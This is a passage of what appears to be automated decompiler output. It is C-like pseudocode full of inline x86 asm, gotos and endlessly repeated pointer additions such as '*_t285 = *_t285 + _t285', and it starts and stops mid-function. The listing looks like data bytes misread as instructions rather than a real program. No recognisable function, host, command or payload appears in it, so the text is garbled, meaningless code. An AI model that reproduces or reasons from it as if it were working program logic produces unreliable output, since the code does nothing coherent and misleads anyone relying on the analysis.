											 *_t281 =  *_t281 + _t281;
											 *_t281 =  *_t281 + _t281;
											_t285 = (_t281 |  *_t281) + 0x6f;
											_pop(_t528);
											 *_t285 =  *_t285 + _t285;
											_t651 = _t648 |  *(_t648 - 3);
											 *_t285 =  *_t285 + _t285;
											if( *_t285 < 0) {
												L43:
												_t427 = (_t285 |  *_t285) + 0x6f;
												 *_t427 =  *_t427 + _t427;
												_t428 = _t482;
												_t504 = _t427;
												 *_t428 =  *_t428 + _t428;
												_t429 = _t428 |  *_t651;
												 *_t651 =  *_t651 - _t504;
												_pop(_t681);
												 *_t429 =  *_t429 + _t429;
												_t482 = _t504 |  *_t694;
												_t650 = _t681 - _t482;
												_pop(ds);
												_t283 = _t429 | 0x0000001f;
												asm("adc [edi], bl");
												asm("adc [ebx+0x5c], dh");
												 *_t283 =  *_t283 + _t283;
												goto L45;
											} else {
												_t705 = _t705 - 1;
												 *_t285 =  *_t285 + _t285;
												if( *_t285 < 0) {
													_t529 = _t528 |  *_t283;
													asm("arpl [eax], ax");
													 *_t650 =  *_t650 + _t529;
													if( *_t650 >= 0) {
														L45:
														asm("outsd");
														asm("movsb");
														 *_t283 =  *_t283 + _t283;
														_t285 = (_t283 |  *_t283) + 0x6f;
														_pop(_t530);
														 *_t285 =  *_t285 + _t285;
														_t651 = _t650 |  *(_t650 - 3);
														 *_t285 =  *_t285 + _t285;
														if( *_t285 < 0) {
															L55:
															_t531 = _t530 |  *(_t694 - 0x5c);
															 *_t285 =  *_t285 + _t285;
															_t285 = _t285 |  *_t285;
															 *_t651 =  *_t651 + _t285;
															 *((intOrPtr*)(_t285 + _t285 - 0x1e9fa00)) =  *((intOrPtr*)(_t285 + _t285 - 0x1e9fa00)) - _t482;
															 *_t531 =  *_t531 + 1;
															asm("adc ecx, [0xa4390d11]");
															 *_t285 =  *_t285 + _t285;
															 *((intOrPtr*)(_t694 + _t705 * 2)) =  *((intOrPtr*)(_t694 + _t705 * 2)) + _t285;
															_pop(_t532);
															 *_t285 =  *_t285 + _t285;
															_t533 = _t532 |  *_t285;
															goto L57;
														} else {
															_t705 = _t705 - 1;
															 *_t285 =  *_t285 + _t285;
															if( *_t285 < 0) {
																_t533 = _t530 |  *_t285;
																asm("arpl [eax], ax");
																 *_t651 =  *_t651 + _t533;
																_t767 =  *_t651;
																if(_t767 >= 0) {
																	L57:
																	asm("int 0x0");
																	 *_t651 =  *_t651 + _t533;
																	_t534 = _t533 +  *_t285;
																	_pop(_t651);
																	 *_t285 =  *_t285 + _t285;
																	_t482 = _t482 |  *_t694;
																	_pop(ds);
																	_t286 = _t285 | 0x101f101f;
																	if(_t286 >= 0) {
																		goto L63;
																	} else {
																		 *_t286 =  *_t286 + _t286;
																		 *_t286 =  *_t286 + _t286;
																		_t414 = (_t286 |  *_t286) + 0x6f;
																		_pop(_t593);
																		 *_t414 =  *_t414 + _t414;
																		_t530 = _t593 |  *_t414;
																		_t415 = _t482;
																		_t482 = _t414;
																		 *_t415 =  *_t415 + _t415;
																		 *_t651 =  *_t651 - _t482;
																		 *_t651 =  *_t651 + (_t593 |  *_t414);
																		_pop(ds);
																		_pop(ds);
																		_t285 = _t415 |  *_t651 | 0x0000001f;
																		asm("adc [edi], bl");
																		asm("adc [ebx+0x5c], dh");
																		goto L59;
																	}
																} else {
																	 *_t285 =  *_t285 + _t285;
																	_t419 = _t285 |  *0x656f17;
																	 *_t651 =  *_t651 + _t533;
																	 *0x666f17 =  *0x666f17 + _t419;
																	 *_t651 =  *_t651 + _t533;
																	_t694[0x19] = _t694[0x19] + _t533;
																	 *_t419 =  *_t419 + _t419;
																	_t421 = (_t419 |  *_t419) + 0x6f;
																	_pop(_t595);
																	 *_t421 =  *_t421 + _t421;
																	_t482 = _t482 |  *_t694;
																	 *_t421 =  *_t421 + _t421;
																	_t530 = _t595 - _t421 |  *_t421;
																	 *_t421 = 0;
																	_t679 = _t651 |  *(_t482 + 0x5e);
																	 *_t421 =  *_t421 + _t421;
																	 *_t679 =  *_t679 - _t482;
																	 *_t679 =  *_t679 + _t530;
																	ds = _t421;
																	_t651 = _t679 - _t482;
																	_pop(ds);
																	_t285 = _t421 |  *_t679 | 0x0000001f;
																	asm("adc [edi], bl");
																	asm("adc [ebx+0x5c], esi");
																	goto L53;
																}
															} else {
																 *_t285 =  *_t285 + _t285;
																_t109 = _t530 + 0x17;
																 *_t109 =  *(_t530 + 0x17) ^ _t285;
																if( *_t109 >= 0) {
																	L53:
																	if(_t767 >= 0) {
																		L59:
																		 *_t285 =  *_t285 + _t285;
																		 *_t285 =  *_t285 + _t285;
																		_t288 = (_t285 |  *_t285) + 0x6f;
																		_pop(_t534);
																		 *_t288 =  *_t288 + _t288;
																		_t652 = _t651 |  *(_t651 + 1);
																		 *_t288 =  *_t288 + _t288;
																		if( *_t288 < 0) {
																			L69:
																			_t410 = (_t288 |  *_t288) + 0x6f;
																			 *_t410 =  *_t410 + _t410;
																			_t411 = _t482;
																			_t503 = _t410;
																			 *_t411 =  *_t411 + _t411;
																			_t412 = _t411 |  *_t652;
																			 *_t652 =  *_t652 - _t503;
																			_pop(_t651);
																			 *_t412 =  *_t412 + _t412;
																			_t482 = _t503 |  *_t694;
																			_pop(ds);
																			_t286 = _t412 | 0x0000001f;
																			asm("adc [edi], bl");
																			asm("adc [ebx+0x5c], dh");
																			 *_t286 =  *_t286 + _t286;
																			goto L71;
																		} else {
																			_t705 = _t705 - 1;
																			 *_t288 =  *_t288 + _t288;
																			if( *_t288 < 0) {
																				_t535 = _t534 |  *_t286;
																				asm("arpl [eax], ax");
																				 *_t651 =  *_t651 + _t535;
																				if( *_t651 >= 0) {
																					L71:
																					asm("outsd");
																					asm("movsb");
																					 *_t286 =  *_t286 + _t286;
																					_t288 = (_t286 |  *_t286) + 0x6f;
																					_pop(_t536);
																					 *_t288 =  *_t288 + _t288;
																					_t652 = _t651 |  *(_t651 + 1);
																					 *_t288 =  *_t288 + _t288;
																					if( *_t288 < 0) {
																						L81:
																						_t537 = _t536 |  *(_t694 - 0x5c);
																						 *_t288 =  *_t288 + _t288;
																						_t288 = _t288 |  *_t288;
																						 *_t652 =  *_t652 + _t537;
																						 *_t482 =  *_t482 + _t652;
																						 *0x14c00 =  *0x14c00 ^ _t288;
																						 *_t288 =  *_t288 + _t288;
																						 *_t652 =  *_t652 + _t537;
																						 *_t288 =  *_t288 + _t288;
																						asm("adc [eax], eax");
																						asm("adc al, [eax]");
																						_push(ss);
																						_t538 = _t537 +  *_t288;
																						_t652 = ss;
																						 *_t288 =  *_t288 + _t288;
																						_t482 = _t482 |  *_t694;
																						goto L83;
																					} else {
																						_t705 = _t705 - 1;
																						 *_t288 =  *_t288 + _t288;
																						if( *_t288 < 0) {
																							_t538 = _t536 |  *_t288;
																							asm("arpl [eax], ax");
																							 *_t652 =  *_t652 + _t538;
																							if( *_t652 >= 0) {
																								L83:
																								_pop(ds);
																								_t700 = _t700 + 1;
																								asm("fiadd dword [edx]");
																								 *((intOrPtr*)(_t652 + 0x28060000)) =  *((intOrPtr*)(_t652 + 0x28060000)) - _t288;
																								 *_t288 =  *_t288 + _t288;
																								 *_t482 =  *_t482 + _t288;
																								asm("outsd");
																								asm("insd");
																								 *_t288 =  *_t288 + _t288;
																								_t289 = _t288 |  *_t482;
																								asm("outsd");
																								asm("outsb");
																								 *_t289 =  *_t289 + _t289;
																								_t654 = _t652 |  *_t652 |  *(_t482 - 0x70);
																								 *_t289 =  *_t289 + _t289;
																								_t536 = _t538 |  *_t289;
																								 *_t654 =  *_t654 + _t536;
																								_t292 =  *_t694 - 0x1f;
																								_t652 = _t654 +  *_t694;
																								if(_t652 >= 0) {
																									goto L88;
																								} else {
																									 *_t292 =  *_t292 + _t292;
																									_t398 = _t292 + 2;
																									_t706 = _t705 + _t694[0x1b];
																									 *_t398 =  *_t398 + _t398;
																									_t288 = _t398 |  *_t482;
																									goto L85;
																								}
																							} else {
																								 *_t288 =  *_t288 + _t288;
																								_t402 = _t288 |  *0x656f17;
																								 *_t652 =  *_t652 + _t538;
																								 *0x666f17 =  *0x666f17 + _t402;
																								 *_t652 =  *_t652 + _t538;
																								_t694[0x19] = _t694[0x19] + _t538;
																								 *_t402 =  *_t402 + _t402;
																								_t404 = (_t402 |  *_t402) + 0x6f;
																								_pop(_t584);
																								 *_t404 =  *_t404 + _t404;
																								_t482 = _t482 |  *_t694;
																								 *_t404 =  *_t404 + _t404;
																								_t536 = _t584 - _t404 |  *_t404;
																								 *_t404 = 0;
																								_t652 = _t652 |  *(_t482 + 0x5e);
																								 *_t404 =  *_t404 + _t404;
																								_t405 = _t404 |  *_t652;
																								 *_t652 =  *_t652 - _t482;
																								 *_t652 =  *_t652 + _t536;
																								ds = _t404;
																								_t795 = _t405 - 0xda;
																								_pop(ds);
																								_t288 = _t405 | 0x0000001f;
																								asm("adc [edi], bl");
																								asm("adc [ebx+0x5c], esi");
																								goto L79;
																							}
																						} else {
																							 *_t288 =  *_t288 + _t288;
																							_t139 = _t536 + 0x17;
																							 *_t139 =  *(_t536 + 0x17) ^ _t288;
																							if( *_t139 >= 0) {
																								L79:
																								if(_t795 >= 0) {
																									L85:
																									asm("outsd");
																									asm("outsb");
																									 *_t288 =  *_t288 + _t288;
																									_t677 = _t652 |  *(_t482 - 0x70);
																									 *_t288 =  *_t288 + _t288;
																									_t484 = _t482 |  *(_t706 + 0x4d);
																									 *_t288 =  *_t288 + _t288;
																									_t399 = _t288;
																									 *_t484 =  *_t484 + _t399;
																									asm("outsd");
																									if ( *_t484 < 0) goto L86;
																									 *_t677 =  *_t677 + _t536;
																									 *_t399 =  *_t399 & _t399;
																									 *_t399 =  *_t399 + _t677;
																									_t675 = _t677 + _t484;
																									 *((intOrPtr*)(_t399 + _t536)) =  *((intOrPtr*)(_t399 + _t536)) + _t536;
																									 *_t399 =  *_t399 + _t399;
																									 *_t675 =  *_t675 + _t399;
																									 *_t675 =  *_t675 - _t484;
																									 *_t675 =  *_t675 + _t536;
																									_pop(ds);
																									asm("adc al, 0xda");
																									_pop(ds);
																									_t396 = _t399 | 0x101f101f;
																									if(_t396 >= 0) {
																										L90:
																										 *_t396 =  *_t396 + _t396;
																										_t676 = _t675 |  *_t700;
																										 *_t536 =  *_t536 + 1;
																										asm("adc eax, [esi]");
																										asm("adc [esi], eax");
																										_t397 = _t396 - 0x10;
																										_t582 = _t536 +  *_t397;
																										_t294 = _t397;
																										 *_t294 =  *_t294 + _t294;
																										_t502 = _t484 |  *_t294;
																										asm("outsd");
																										asm("rol dword [eax], 1");
																										 *_t676 =  *_t676 + _t582;
																										 *_t294 =  *_t294 + _t294;
																										_t583 = _t582 -  *_t694;
																										 *_t676 =  *_t676 + _t294;
																										 *((intOrPtr*)(_t294 + 0x160a0000)) =  *((intOrPtr*)(_t294 + 0x160a0000)) - _t502;
																										asm("outsd");
																										asm("rol dword [eax], 1");
																										 *_t676 =  *_t676 + _t583;
																										 *_t294 =  *_t294 + _t294;
																										 *_t294 =  *_t294 + _t294;
																										_t541 = _t583 +  *_t294;
																										_pop(_t656);
																										 *_t294 =  *_t294 + _t294;
																										_t484 = _t502 |  *_t694;
																									} else {
																										 *_t396 =  *_t396 + _t396;
																										_t401 = _t396 + 0x15;
																										asm("outsd");
																										asm("insd");
																										 *_t401 =  *_t401 + _t401;
																										_t292 = _t401 |  *_t484;
																										L88:
																										_t706 = _t705 + _t694[0x1b];
																										 *_t292 =  *_t292 + _t292;
																										asm("outsd");
																										 *_t292 =  *_t292 + _t292;
																										_t540 = _t536 |  *_t292 |  *0x16082c09;
																										 *_t292 =  *_t292 + _t292;
																										_t293 = _t292 |  *_t292;
																										 *_t293 =  *_t293 + _t293;
																										_t541 = _t540 +  *_t293;
																										_pop(_t655);
																										 *_t293 =  *_t293 + _t293;
																										_t484 = _t482 - _t540 |  *_t694;
																										_t656 = _t655 - _t484;
																										_pop(ds);
																										_t294 = _t293 | 0x101f101f;
																										if(_t294 < 0) {
																											 *_t294 =  *_t294 + _t294;
																											_t393 = _t294 + 0x15;
																											asm("outsd");
																											asm("insd");
																											 *_t393 =  *_t393 + _t393;
																											_t394 = _t393 |  *_t484;
																											asm("outsd");
																											asm("outsb");
																											 *_t394 =  *_t394 + _t394;
																											asm("outsd");
																											 *_t394 =  *_t394 + _t394;
																											_t675 = _t656 |  *_t484 |  *_t484;
																											_t395 = _t394 + 0x342c0511;
																											_t396 = _t395;
																											 *_t396 =  *_t396 + _t396;
																											_t536 = (_t541 |  *_t394) +  *_t395 |  *(_t694 - 0x30);
																											goto L90;
																										}
																									}
																								} else {
																									 *_t288 =  *_t288 + _t288;
																									goto L81;
																								}
																							} else {
																								 *_t288 =  *_t288 + _t288;
																								_t536 = _t536 |  *_t288;
																								asm("into");
																								 *_t288 =  *_t288 + _t288;
																								 *_t652 =  *_t652 - _t482;
																								 *_t652 =  *_t652 + _t536;
																								_pop(ds);
																								_pop(ds);
																								_t288 = _t288 |  *_t652 | 0x101f101f;
																								goto L75;
																							}
																						}
																					}
																				} else {
																					 *_t286 =  *_t286 + _t286;
																					_t407 = _t286 |  *0x656f17;
																					 *_t651 =  *_t651 + _t535;
																					 *0x666f17 =  *0x666f17 + _t407;
																					 *_t651 =  *_t651 + _t535;
																					_t694[0x19] = _t694[0x19] + _t535;
																					 *_t407 =  *_t407 + _t407;
																					_t408 = _t407 |  *_t407;
																					 *_t408 =  *_t408 + _t482;
																					asm("rol dword [eax], 1");
																					 *_t408 =  *_t408 + _t408;
																					 *((intOrPtr*)(_t694 + _t705 * 2)) =  *((intOrPtr*)(_t694 + _t705 * 2)) + _t408;
																					_pop(_t586);
																					 *_t408 =  *_t408 + _t408;
																					_t587 = _t586 |  *_t408;
																					asm("int 0x0");
																					 *_t651 =  *_t651 + _t587;
																					_t536 = _t587 +  *_t408;
																					_pop(_t652);
																					 *_t408 =  *_t408 + _t408;
																					_t482 = _t482 |  *_t694;
																					_pop(ds);
																					_t288 = _t408 | 0x101f101f;
																					if(_t288 >= 0) {
																						L75:
																						asm("adc [ebx+0x5c], dh");
																					} else {
																						 *_t288 =  *_t288 + _t288;
																						goto L68;
																					}
																				}
																			} else {
																				 *_t288 =  *_t288 + _t288;
																				_t127 = _t534 + 0x17;
																				 *_t127 =  *(_t534 + 0x17) ^ _t288;
																				if( *_t127 >= 0) {
																					L68:
																					asm("outsd");
																					asm("movsb");
																					 *_t288 =  *_t288 + _t288;
																					goto L69;
																				} else {
																					 *_t288 =  *_t288 + _t288;
																					_t534 = _t534 |  *_t288;
																					asm("into");
																					 *_t288 =  *_t288 + _t288;
																					 *_t652 =  *_t652 - _t482;
																					 *_t652 =  *_t652 + _t534;
																					_pop(ds);
																					_pop(ds);
																					_t286 = _t288 |  *_t652 | 0x101f101f;
																					L63:
																					asm("adc [ebx+0x5c], dh");
																				}
																			}
																		}
																	} else {
																		 *_t285 =  *_t285 + _t285;
																		goto L55;
																	}
																} else {
																	 *_t285 =  *_t285 + _t285;
																	_t530 = _t530 |  *_t285;
																	asm("into");
																	 *_t285 =  *_t285 + _t285;
																	_t423 = _t285 |  *_t651;
																	 *_t651 =  *_t651 - _t482;
																	 *_t651 =  *_t651 + _t530;
																	_pop(ds);
																	_t651 = _t651 - _t482;
																	_pop(ds);
																	_t285 = _t423 | 0x101f101f;
																	goto L49;
																}
															}
														}
													} else {
														 *_t283 =  *_t283 + _t283;
														_t424 = _t283 |  *0x656f17;
														 *_t650 =  *_t650 + _t529;
														 *0x666f17 =  *0x666f17 + _t424;
														 *_t650 =  *_t650 + _t529;
														_t694[0x19] = _t694[0x19] + _t529;
														 *_t424 =  *_t424 + _t424;
														_t425 = _t424 |  *_t424;
														 *_t425 =  *_t425 + _t482;
														asm("rol dword [eax], 1");
														 *_t425 =  *_t425 + _t425;
														 *((intOrPtr*)(_t694 + _t705 * 2)) =  *((intOrPtr*)(_t694 + _t705 * 2)) + _t425;
														_pop(_t597);
														 *_t425 =  *_t425 + _t425;
														_t598 = _t597 |  *_t425;
														asm("int 0x0");
														 *_t650 =  *_t650 + _t598;
														_t530 = _t598 +  *_t425;
														_pop(_t680);
														 *_t425 =  *_t425 + _t425;
														_t482 = _t482 |  *_t694;
														_t651 = _t680 - _t482;
														_pop(ds);
														_t285 = _t425 | 0x101f101f;
														if(_t285 >= 0) {
															L49:
															asm("adc [ebx+0x5c], dh");
														} else {
															 *_t285 =  *_t285 + _t285;
															goto L42;
														}
													}
												} else {
													 *_t285 =  *_t285 + _t285;
													_t97 = _t528 + 0x17;
													 *_t97 =  *(_t528 + 0x17) ^ _t285;
													if( *_t97 >= 0) {
														L42:
														asm("outsd");
														asm("movsb");
														 *_t285 =  *_t285 + _t285;
														goto L43;
													} else {
														 *_t285 =  *_t285 + _t285;
														_t528 = _t528 |  *_t285;
														asm("into");
														 *_t285 =  *_t285 + _t285;
														 *_t651 =  *_t651 - _t482;
														 *_t651 =  *_t651 + _t528;
														_pop(ds);
														_t650 = _t651 - _t482;
														_pop(ds);
														_t283 = _t285 |  *_t651 | 0x101f101f;
														L37:
														asm("adc [ebx+0x5c], dh");
													}
												}
											}
										} else {
											 *_t281 =  *_t281 + _t281;
											L30:
											 *_t281 =  *_t281 + _t281;
											_t282 = _t281 |  *_t281;
											 *_t648 =  *_t648 + _t282;
											 *((intOrPtr*)(_t648 + 0x16060000)) =  *((intOrPtr*)(_t648 + 0x16060000)) - _t482;
											 *(_t524 |  *(_t694 - 0x5c)) =  *(_t524 |  *(_t694 - 0x5c)) + 1;
											asm("adc ecx, [ecx+edx]");
											_t281 = _t282 | 0x00000039;
											asm("movsb");
											 *_t281 =  *_t281 + _t281;
											 *((intOrPtr*)(_t694 + _t705 * 2)) =  *((intOrPtr*)(_t694 + _t705 * 2)) + _t281;
											_pop(_t526);
											 *_t281 =  *_t281 + _t281;
											_t527 = _t526 |  *_t281;
											goto L31;
										}
									}
								} else {
									 *_t281 =  *_t281 + _t281;
									goto L19;
								}
							}
						} else {
							 *_t281 =  *_t281 + _t281;
							_t69 = _t522 + 0x17;
							 *_t69 =  *(_t522 + 0x17) & _t281;
							if( *_t69 >= 0) {
								L19:
								asm("outsd");
								asm("movsb");
								 *_t281 =  *_t281 + _t281;
								goto L20;
							} else {
								 *_t281 =  *_t281 + _t281;
								_t522 = _t522 |  *_t281;
								asm("into");
								 *_t281 =  *_t281 + _t281;
								_t279 = _t281 |  *_t648;
								 *_t648 =  *_t648 - _t482;
								 *_t648 =  *_t648 + _t522;
								_pop(ds);
								asm("adc al, 0xda");
								_pop(ds);
								_t482 = _t482 |  *_t694;
								asm("adc [edi], bl");
								goto L15;
							}
						}
					}
				}
				_pop(ds);
				_t295 = _t294 | 0x101f101f;
				if(_t295 >= 0) {
					L96:
					asm("insd");
					 *_t295 =  *_t295 + _t295;
					 *_t295 =  *_t295 + _t295;
					_t296 = _t295 + 2;
					_t707 = _t706 + _t694[0x1b];
					 *_t296 =  *_t296 + _t296;
					_t484 = _t484 |  *(_t706 + 0x4f) |  *(_t707 + 0x50);
					 *_t296 =  *_t296 + _t296;
					 *_t656 =  *_t656 - _t484;
					 *_t656 =  *_t656 + _t541;
					_pop(ds);
					asm("adc al, 0xda");
					_pop(ds);
					_t298 = _t296 + 0x00000002 | 0x101f101f;
					if(_t298 >= 0) {
						goto L100;
					} else {
						 *_t298 =  *_t298 + _t298;
						_t574 = _t541 |  *_t484;
						asm("adc al, [ecx]");
						_t712 = _t707 + _t694[0x1b];
						 *_t298 =  *_t298 + _t298;
						goto L98;
					}
				} else {
					 *_t295 =  *_t295 + _t295;
					_t386 = _t295 + 0x15;
					asm("outsd");
					asm("insd");
					 *_t386 =  *_t386 + _t386;
					_t387 = _t386 |  *_t484;
					asm("outsd");
					asm("outsb");
					 *_t387 =  *_t387 + _t387;
					asm("outsd");
					 *_t387 =  *_t387 + _t387;
					_pop(es);
					asm("adc [edi], eax");
					_t388 = _t387 - 0xe;
					_t574 = (_t541 |  *_t387) +  *_t388;
					_t298 = _t388;
					 *_t298 =  *_t298 + _t298;
					_t656 = _t656 |  *_t484 |  *_t484 |  *_t694;
					asm("outsd");
					asm("rol dword [eax], 1");
					 *_t656 =  *_t656 + _t574;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t656 =  *_t656 + _t298;
					_t712 = _t706 +  *_t298;
					if (_t712 >= 0) goto L93;
					 *_t656 =  *_t656 + _t574;
					 *_t656 =  *_t656 + _t574;
					_t700 = _t700 + 1;
					 *_t656 =  *_t656 + _t298;
					_push(ss);
					if( *_t656 >= 0) {
						L98:
						 *_t656 =  *_t656 + _t574;
						_t707 = _t712 + _t694[0x1b];
						 *_t298 =  *_t298 + _t298;
						asm("outsd");
						 *_t298 =  *_t298 + _t298;
						_push(es);
						_t382 = _t298 - 0x17;
						_t671 = _t656 +  *_t694;
						_t694[0x18000] = _t694[0x18000] - _t484;
						_t577 = (_t574 |  *_t298 |  *_t656) +  *_t382;
						 *_t382 =  *_t382 + 0x826f0a00;
						 *_t382 =  *_t382 + _t382;
						_t383 = _t382 |  *_t382;
						 *_t484 =  *_t484 + _t577;
						 *_t671 =  *_t671 + _t383;
						_t694[0x18000] = _t694[0x18000] - _t484;
						 *_t383 =  *_t383;
						_t569 = _t577 +  *_t383 |  *(_t694 - 0x7e);
						 *_t383 =  *_t383 + _t383;
						_t384 = _t383 |  *_t383;
						 *_t671 =  *_t671 + _t384;
						 *_t671 =  *_t671 - _t484;
						 *_t671 =  *_t671 + _t569;
						ds = ss;
						_t658 = _t671 - _t484;
						ds = ss;
						_t303 = _t384 | 0x101f101f;
						if(_t303 >= 0) {
							L102:
							_t658 = _t658 |  *_t658;
							 *_t484 =  *_t484 + _t303;
							asm("outsd");
							asm("insd");
							 *_t303 =  *_t303 + _t303;
							_t377 = _t303 |  *_t484;
							asm("outsd");
							asm("outsb");
							 *_t377 =  *_t377 + _t377;
							asm("outsd");
							 *_t377 =  *_t377 + _t377;
							_pop(ss);
							 *((intOrPtr*)(_t707 + 0x60000)) =  *((intOrPtr*)(_t707 + 0x60000)) - _t484;
							_t572 = (_t569 |  *_t377 |  *0x2172c09) +  *_t377;
							 *_t377 =  *_t377 + 0x826f0a00;
							 *_t377 =  *_t377 + _t377;
							_t378 = _t377 |  *_t377;
							 *_t484 =  *_t484 + _t572;
							_push(ss);
							 *_t658 =  *_t658 + _t378;
							_push(ss);
							 *((intOrPtr*)(_t707 + 0x60000)) =  *((intOrPtr*)(_t707 + 0x60000)) - _t484;
							 *_t378 =  *_t378;
							_t546 = _t572 +  *_t378 |  *(_t694 - 0x7e);
							 *_t378 =  *_t378 + _t378;
							_t376 = _t378 |  *_t378;
							 *_t658 =  *_t658 + _t376;
							if( *_t658 != 0) {
								goto L109;
							} else {
								 *_t376 =  *_t376 + _t376;
								_t700 = _t700 + 1;
								_t303 = _t376 + 0x50 +  *_t484;
								asm("outsd");
								 *_t658 =  *_t658 + _t546;
								 *((intOrPtr*)(_t546 + 0x130a0000)) =  *((intOrPtr*)(_t546 + 0x130a0000)) - _t546;
								goto L104;
							}
						} else {
							 *_t303 =  *_t303 + _t303;
							_t541 = _t569 |  *_t484;
							L100:
							 *_t484 =  *_t484 + _t298;
							asm("outsd");
							asm("insd");
							 *_t298 =  *_t298 + _t298;
							_t299 = _t298 |  *_t484;
							asm("outsd");
							asm("outsb");
							 *_t299 =  *_t299 + _t299;
							asm("outsd");
							 *_t299 =  *_t299 + _t299;
							_t300 = _t299 - 0x17;
							_t658 = (_t656 |  *_t656) +  *_t694;
							 *((intOrPtr*)(_t484 + 0x60000)) =  *((intOrPtr*)(_t484 + 0x60000)) - _t484;
							_t544 = (_t541 |  *_t299 |  *(_t299 + (_t541 |  *_t299))) +  *_t300;
							 *_t300 =  *_t300 + 0x826f0a00;
							 *_t300 =  *_t300 + _t300;
							_t301 = _t300 |  *_t300;
							 *_t484 =  *_t484 + _t544;
							 *_t658 =  *_t658 + _t301;
							 *((intOrPtr*)(_t484 + 0x60000)) =  *((intOrPtr*)(_t484 + 0x60000)) - _t484;
							 *_t301 =  *_t301;
							_t546 = _t544 +  *_t301 |  *(_t694 - 0x7e);
							 *_t301 =  *_t301 + _t301;
							_t302 = _t301 |  *_t301;
							 *_t658 =  *_t658 + _t302;
							 *_t658 =  *_t658 - _t484;
							 *_t658 =  *_t658 + _t546;
							ds = ss;
							ds = ss;
							_t303 = _t302 | 0x101f101f;
							if(_t303 >= 0) {
								L104:
								 *_t658 =  *_t658 + _t546;
								asm("adc al, [0x7d28]");
								_t305 = _t303 + 0x00982802 |  *_t658;
								if(_t305 < 0) {
									L111:
									_t484 = _t484 +  *((intOrPtr*)(_t484 + 0x52));
									 *_t305 =  *_t305 + _t305;
									 *_t658 =  *_t658 + _t546;
									_t307 = _t305 + 0x0000002b &  *_t658;
									_t694 = _t694 +  *((intOrPtr*)(_t707 + 0x52));
									 *_t307 =  *_t307 + _t307;
									_t308 = _t307 + 0x2a;
									 *_t308 =  *_t308 + _t308;
								} else {
									 *_t305 =  *_t305 + _t305;
									_t373 = _t305 + 0x28;
									if (_t373 >= 0) goto L106;
									 *_t658 =  *_t658 + _t546;
									asm("ficom dword [edx]");
									_t308 = _t373 + 0x00007e28 |  *_t658;
									if(_t308 >= 0) {
										 *_t308 =  *_t308 + _t308;
										_t375 = _t308 + 0x28;
										if (_t375 <= 0) goto L108;
										 *_t658 =  *_t658 + _t546;
										asm("fidiv dword [ebx-0x70]");
										 *_t375 =  *_t375 + _t375;
										_t546 = _t546 |  *(_t694 - 0x56);
										 *_t375 =  *_t375 + _t375;
										_t376 = _t375 |  *_t375;
										L109:
										 *_t376 =  *_t376 + _t376;
										_t314 = _t376 +  *_t484;
										 *_t484 =  *_t484 - _t658;
										 *_t658 =  *_t658 + _t546;
										 *_t658 =  *_t658 + _t314;
										 *((intOrPtr*)(_t314 + _t314)) =  *((intOrPtr*)(_t314 + _t314)) - _t658;
										L110:
										_t316 = (_t314 |  *_t314) -  *_t700;
										 *_t316 =  *_t316 + _t316;
										 *_t658 =  *_t658 + _t546;
										_t318 = _t316 + 0x0000002b &  *_t658;
										_t694 = _t694 +  *((intOrPtr*)(_t707 + 0x51));
										 *_t318 =  *_t318 + _t318;
										_t305 = _t318 + 0x2a;
										_t484 = _t484 +  *((intOrPtr*)(_t484 + 0x51)) +  *[es:ebx+0x52];
										goto L111;
									}
								}
							} else {
								 *_t303 =  *_t303 + _t303;
								_t569 = _t546 |  *_t484;
								goto L102;
							}
						}
					} else {
						 *_t298 =  *_t298 + _t298;
						_t389 = _t298 + 2;
						_t713 = _t712 +  *_t389;
						if (_t713 < 0) goto L95;
						 *_t656 =  *_t656 + _t574;
						 *_t656 =  *_t656 + _t574;
						 *_t389 =  *_t389 + _t389;
						asm("adc esi, [eax]");
						_t391 =  *_t574;
						 *_t574 = _t389;
						 *_t391 =  *_t391 + _t391;
						_t295 = _t391 -  *_t391;
						 *_t574 =  *_t574 + _t656;
						 *_t656 =  *_t656 + _t295;
						_t706 = _t713 + _t694[0x1b];
						goto L96;
					}
				}
				 *_t308 =  *_t308 + _t308;
				asm("adc esi, [eax]");
				_pop(_t310);
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				_t547 = _t546 +  *_t310;
				asm("rol byte [eax], cl");
				 *_t658 =  *_t658 + _t547;
				 *_t658 =  *_t658 + _t310;
				_t484 = _t484 + _t658;
				_push(es);
				asm("stosd");
				 *_t310 =  *_t310 + _t310;
				_push(es);
				if( *_t310 >= 0) {
					L118:
					 *_t694 =  *_t694 ^ _t310;
					_t548 = _t547 + _t484;
					 *_t310 =  *_t310 + _t310;
					 *((intOrPtr*)(_t310 + _t310)) =  *((intOrPtr*)(_t310 + _t310)) + _t548;
					 *_t548 =  *_t548 + _t658;
					 *((intOrPtr*)(_t694 + _t707 * 2)) =  *((intOrPtr*)(_t694 + _t707 * 2)) + _t310;
					_pop(_t549);
					 *_t310 =  *_t310 + _t310;
					asm("outsd");
					 *_t310 =  *_t310 + _t310;
					_t312 = (_t310 |  *_t310) + 0x6f;
					_t550 = _t549;
					 *_t312 = _t312 +  *_t312;
					asm("lds eax, [eax]");
					 *_t658 =  *_t658 + (_t550 |  *_t312);
					asm("outsd");
					return _t312;
				} else {
					 *_t310 =  *_t310 + _t310;
					_t546 = _t547 |  *_t310;
					_t313 = _t310 - 1;
					 *_t313 =  *_t313 + _t313;
					_t314 = _t313 |  *_t313;
					_t659 = _t658 +  *((intOrPtr*)(_t658 + 5));
					 *_t314 =  *_t314 + _t314;
					if( *_t314 < 0) {
						L117:
						_t547 = _t546 - 1;
						 *_t314 =  *_t314 + _t314;
						_t310 = _t314 |  *_t314;
						_t484 = _t484 +  *_t484;
						asm("outsd");
						_t658 = _t659 -  *_t484;
						goto L118;
					} else {
						asm("cmpsd");
						 *_t314 =  *_t314 + _t314;
						_push(es);
						 *_t659 =  *_t659 + _t314;
						 *((intOrPtr*)(_t707 + 0x280a0000)) =  *((intOrPtr*)(_t707 + 0x280a0000)) - _t484;
						_t658 = _t659 +  *_t700;
						_push(ss);
						if(_t658 >= 0) {
							goto L110;
						} else {
							 *_t314 =  *_t314 + _t314;
							_t484 = _t484 |  *(_t707 + 0x55);
							 *_t314 =  *_t314 + _t314;
							_t319 = _t314 + 2;
							_push(ss);
							if(_t319 >= 0) {
								asm("sbb [edx], al");
								 *_t658 =  *_t658 - _t484;
								 *_t658 =  *_t658 + _t546;
								asm("sbb bl, dl");
								_pop(_t488);
								 *_t319 =  *_t319 + _t319;
								asm("fidiv dword [ebx+0x5c]");
								 *_t319 =  *_t319 + _t319;
